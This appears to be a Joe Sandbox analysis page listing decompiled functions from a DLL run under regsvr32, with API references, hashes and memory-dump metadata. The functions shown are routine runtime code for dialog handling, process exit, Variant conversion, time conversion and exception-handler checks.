Opcode ID: 23dabd8ce938acf1019d2c549cce85f890423a1236ca905f218f127779b1fe5f
Instruction ID: b4e8bfe9618fd34d7640ff0de57aa03a35dd0412442fb7acc563b54c727098f6
Opcode Fuzzy Hash: 23dabd8ce938acf1019d2c549cce85f890423a1236ca905f218f127779b1fe5f
Instruction Fuzzy Hash: 45311072C0015AABCF11DF94CC859DEBBB5FF48350F264129FA246A160CB35C991DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1001ECC2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001ECC2(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t12;
				struct HWND__* _t14;
				struct HWND__* _t17;
				struct HWND__** _t24;
				void* _t25;

				_t24 = _a4;
				_t25 = __ecx;
				if(E1001F67B(__ecx, _t24) != 0) {
					L12:
					return 1;
				}
				_t12 = E100212E7(__ecx);
				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x64)) == 0) {
					if(_t24[1] != 0x100) {
						L13:
						return E1001FF99(_t24);
					}
					_t14 = _t24[2];
					if(_t14 == 0x1b || _t14 == 3) {
						if((GetWindowLongA( *_t24, 0xfffffff0) & 0x00000004) == 0 || E1002522B( *_t24, ?str?) == 0) {
							goto L13;
						} else {
							_t17 = GetDlgItem( *(_t25 + 0x1c), 2);
							if(_t17 == 0 || IsWindowEnabled(_t17) != 0) {
								SendMessageA( *(_t25 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

0x1001ecc4
0x1001ecc9
0x1001ecd2
0x1001ed49
0x00000000
0x1001ed4b
0x1001ecd6
0x1001ecdd
0x1001ecf0
0x1001ed4e
0x00000000
0x1001ed51
0x1001ecf2
0x1001ecf8
0x1001ed0b
0x00000000
0x1001ed1d
0x1001ed22
0x1001ed2a
0x1001ed43
0x00000000
0x00000000
0x00000000
0x00000000
0x1001ed2a
0x00000000
0x00000000
0x00000000
0x1001ece5
0x00000000
0x1001ece5

APIs

GetWindowLongA.USER32 ref: 1001ED03
GetDlgItem.USER32 ref: 1001ED22
IsWindowEnabled.USER32(00000000), ref: 1001ED2D
SendMessageA.USER32 ref: 1001ED43

Strings

Edit, xrefs: 1001ED0D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: 91162103ee285ac8f16726a183547f732284b545e3a23eb7035474981c366609
Instruction ID: 666fdedf627e1b61233f41cd9895a592b23949222c27b88d28614513ed27c2f0
Opcode Fuzzy Hash: 91162103ee285ac8f16726a183547f732284b545e3a23eb7035474981c366609
Instruction Fuzzy Hash: DA01D234204786BAEB20EB21AC45B5EBBE9EF12790F154529F902DE4F1CB70ECD2C550

Uniqueness

Uniqueness Score: -1.00%

Function 10011AAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10011AAB(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}

0x10011ab0
0x10011ab8
0x10011ac0
0x10011ac8
0x10011ace
0x10011ace
0x10011ac8
0x10011ad4

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,10011C19,?,1002E870,00000008,10011C3F,?,00000001,00000000,100172D9,00000003), ref: 10011AB0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011AC0
ExitProcess.KERNEL32 ref: 10011AD4

Strings

CorExitProcess, xrefs: 10011ABA
mscoree.dll, xrefs: 10011AAB

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: c0356d4db37c8cf768eb70992d152702753b58a0521905386c10f19f44868b62
Instruction ID: e94fd4e95ff06cc3c52a799842b6ddcd47d5a2a8c6c61059b5387d74fce0c726
Opcode Fuzzy Hash: c0356d4db37c8cf768eb70992d152702753b58a0521905386c10f19f44868b62
Instruction Fuzzy Hash: 48D0C930240B91EBEB05ABA29E48A5E3BA8FF407C1B910428F54AD4830DF30DC45AA12

Uniqueness

Uniqueness Score: -1.00%

Function 10029903 Relevance: 7.7, APIs: 5, Instructions: 236
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10029903(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011A8C(E1002AEBF, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10006CE0(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E100116D0((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10012400( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10029668( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10006CE0(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E100116D0( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E100296AA( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10029BC9))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							 *(_t168 + 8) = _t182;
							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1002A4DA();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1002A4DA();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10006CE0(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E100116D0(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011CC0(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}

0x10029903
0x10029903
0x10029908
0x1002990d
0x10029911
0x10029914
0x1002991b
0x1002991e
0x10029921
0x10029925
0x10029928
0x1002992d
0x1002992d
0x1002993d
0x10029942
0x10029949
0x1002994d
0x100299a7
0x100299a7
0x100299b1
0x100299b8
0x100299b9
0x100299fd
0x100299fd
0x10029bb5
0x10029bbb
0x10029bc6
0x10029bc6
0x100299c9
0x100299ce
0x100299d1
0x100299da
0x100299df
0x100299ed
0x100299ef
0x100299ef
0x100299f3
0x100299fa
0x100299fb
0x10029a0f
0x10029a17
0x10029a1a
0x10029a2e
0x10029a33
0x10029a37
0x10029a3a
0x10029a78
0x10029a78
0x10029a7b
0x10029a7f
0x10029a84
0x10029a9f
0x10029a9f
0x10029aa4
0x00000000
0x00000000
0x10029aaa
0x10029aaf
0x10029b80
0x10029b83
0x10029baa
0x10029bad
0x10029bad
0x10029bb3
0x10029bb3
0x00000000
0x10029bb3
0x10029b85
0x10029b86
0x10029b90
0x10029b92
0x10029b97
0x10029b97
0x00000000
0x10029b92
0x10029b88
0x10029b8b
0x10029ba0
0x00000000
0x10029ba0
0x10029b8e
0x00000000
0x00000000
0x00000000
0x10029b8e
0x10029ab5
0x10029ab8
0x10029abe
0x10029ac4
0x00000000
0x00000000
0x10029aca
0x00000000
0x10029b6d
0x10029b6d
0x00000000
0x00000000
0x10029b46
0x00000000
0x00000000
0x10029b59
0x10029b5c
0x00000000
0x00000000
0x10029b64
0x00000000
0x00000000
0x10029b4b
0x10029b4e
0x10029b51
0x10029b54
0x00000000
0x00000000
0x10029b69
0x10029b6b
0x00000000
0x00000000
0x10029b76
0x10029b77
0x10029b78
0x10029b79
0x00000000
0x00000000
0x00000000
0x00000000
0x10029b41
0x00000000
0x00000000
0x10029aca
0x10029a8c
0x10029a8f
0x10029a95
0x10029a99
0x10029a9a
0x00000000
0x10029a8c
0x10029a3c
0x10029a43
0x10029a46
0x10029b03
0x10029b04
0x10029b05
0x10029b08
0x10029b0d
0x10029b13
0x00000000
0x10029b13
0x10029a4f
0x10029aee
0x10029aef
0x10029af0
0x10029af3
0x10029af8
0x10029afb
0x10029afb
0x00000000
0x10029afb
0x10029a58
0x10029adf
0x10029ae0
0x10029ae1
0x10029ae4
0x10029ae9
0x00000000
0x10029ae9
0x10029a61
0x10029ad1
0x10029ad2
0x10029ad3
0x10029adb
0x10029a68
0x10029a68
0x10029a69
0x10029a6a
0x10029a72
0x10029a75
0x10029a75
0x00000000
0x10029a61
0x00000000
0x100299fb
0x1002994f
0x1002994f
0x10029953
0x1002995a
0x1002995b
0x00000000
0x00000000
0x10029969
0x1002996e
0x10029971
0x10029978
0x1002997d
0x10029981
0x10029988
0x1002998b
0x1002998f
0x1002998f
0x10029990
0x10029994
0x10029995
0x10029999
0x1002999c
0x100299a4
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10029908
lstrlenA.KERNEL32(?,?,00000000), ref: 10029933
VariantClear.OLEAUT32(0000000C), ref: 10029A8F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariantlstrlen
String ID:
API String ID: 2416264355-0
Opcode ID: 4469b95eb921fd0463e6dea2447178b2bccff52566afd474d474e568cc894508
Instruction ID: 6ab4ae10c4a3f7f29aa082c0c5d1e6c41eb83bf1ed1b9d6822d3df0f95aa23ce
Opcode Fuzzy Hash: 4469b95eb921fd0463e6dea2447178b2bccff52566afd474d474e568cc894508
Instruction Fuzzy Hash: A4819E3590061AEBCF11CFA8E981AAEBBB0FF052D4F608159FC54AB250D731E991DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10018F3F Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10018F3F(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E100142F3(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013440(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E10013400(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E10013400(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013440(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E10013400(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x10037c18;
										if(_v12 == 0) {
											_t159 = 0x10037c4c;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013440( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013440(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E10013400(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013440(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E10011233(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1003a4e0;
						goto L10;
					}
				}
			}

0x10018f45
0x10018f48
0x10018f4d
0x10018f52
0x10018f54
0x10018f57
0x10018f5a
0x10018f5f
0x10018f61
0x10018f63
0x1001915d
0x00000000
0x10018f73
0x10018f73
0x10018f79
0x00000000
0x10018f89
0x10018f8d
0x10018fa5
0x10018fa5
0x10018fa8
0x10018fb8
0x10018fbb
0x10018fc1
0x10018fcb
0x10018fce
0x10018fd1
0x10018fd8
0x10018fd9
0x10018fde
0x10018feb
0x10018fee
0x10018ff2
0x10018ff5
0x10018ffa
0x10018ffd
0x10019004
0x10019008
0x10019018
0x1001901a
0x1001901d
0x10019021
0x10019071
0x10019072
0x10019077
0x10019086
0x1001908e
0x10019094
0x10019098
0x00000000
0x00000000
0x00000000
0x10019098
0x1001907e
0x1001907f
0x10019080
0x10019084
0x00000000
0x00000000
0x00000000
0x10019029
0x10019029
0x1001902c
0x1001902f
0x10019035
0x1001903b
0x1001903c
0x10019041
0x10019050
0x10019058
0x1001905e
0x10019062
0x100190a1
0x100190aa
0x100190b5
0x100190b8
0x100190c5
0x100190c7
0x100190ce
0x100190d3
0x100190d5
0x100190d5
0x100190da
0x100190df
0x100190e3
0x100190f2
0x100190f2
0x100190f3
0x100190fb
0x10019107
0x10019111
0x10019112
0x10019121
0x1001912b
0x1001912e
0x1001913c
0x1001913e
0x10019147
0x1001914c
0x10019154
0x10019156
0x00000000
0x100190e5
0x100190e5
0x100190e7
0x100190e7
0x100190e8
0x100190ed
0x00000000
0x100190ed
0x100190e3
0x10019064
0x10019064
0x10019066
0x1001909a
0x1001909a
0x00000000
0x1001909a
0x10019048
0x10019049
0x1001904a
0x1001904e
0x00000000
0x00000000
0x00000000
0x1001904e
0x10019021
0x10018f91
0x10018f99
0x10018f9c
0x00000000
0x00000000
0x10018f9e
0x00000000
0x10018f9e
0x10018f79

APIs

Part of subcall function 100142F3: GetLastError.KERNEL32(?,00000000,10013373,10014CA0,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010,100144CB), ref: 100142F5
Part of subcall function 100142F3: FlsGetValue.KERNEL32(?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?,1002E838), ref: 10014303
Part of subcall function 100142F3: FlsSetValue.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 1001432A
Part of subcall function 100142F3: GetCurrentThreadId.KERNEL32 ref: 10014342
Part of subcall function 100142F3: SetLastError.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 10014359

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018FB1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100190AE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019107
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019124
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019147

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
String ID:
API String ID: 223281555-0
Opcode ID: 6ff7ea67268cc61001d86e24f94c4ddf6451e47b913e42406bab9b5f02c4bb20
Instruction ID: 383c94443e27b0158f879f520f0c2ae8f7135cb71ab7b3e58b1ef996f7e1f60c
Opcode Fuzzy Hash: 6ff7ea67268cc61001d86e24f94c4ddf6451e47b913e42406bab9b5f02c4bb20
Instruction Fuzzy Hash: 31610576A00306AFE715CF99CC41B9AB3F6FB88764F21812DF6009F281D775E9808B10

Uniqueness

Uniqueness Score: -1.00%

Function 1001650B Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001650B(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1003a350; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1003a398, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1003a350; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1003a398, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1003a350 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1003a358 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1003a354 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
